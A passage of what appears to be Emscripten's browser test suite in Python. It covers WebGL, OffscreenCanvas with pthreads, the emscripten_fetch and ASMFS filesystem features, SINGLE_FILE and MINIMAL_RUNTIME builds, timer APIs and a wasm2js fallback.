self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that a shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
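# A hypothetical shell fragment illustrating the preallocation (sketch only; the
# real markup lives in test_preallocated_heap_shell.html):
#
#   <script>
#     var Module = { buffer: new ArrayBuffer(16 * 1024 * 1024) };
#   </script>
#   <script src="test.js"></script>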
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when the user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
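# The flag constants referenced above live in <emscripten/fetch.h>; a request that
# sets none of them looks roughly like this (hypothetical snippet, not the actual
# test source):
#
#   emscripten_fetch_attr_t attr;
#   emscripten_fetch_attr_init(&attr);
#   strcpy(attr.requestMethod, "GET");
#   attr.attributes = EMSCRIPTEN_FETCH_LOAD_TO_MEMORY | EMSCRIPTEN_FETCH_SYNCHRONOUS;
#   emscripten_fetch_t *fetch = emscripten_fetch(&attr, "gears.png");
#   /* ... use fetch->data / fetch->numBytes, then ... */
#   emscripten_fetch_close(fetch);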
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[print]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
      # compile the code with the modularize feature enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
  # also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
      # compile the code with the modularize feature enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
    except Exception:
      # dump the wasm file; this is meant to help debug #10539 on the bots
      print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
      # re-raise with a bare `raise` so the original traceback is preserved
      raise
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
      # Then disable WebAssembly support in the VM and try again. It should still work via the Wasm2JS fallback.
html = open('test.html', 'r').read()
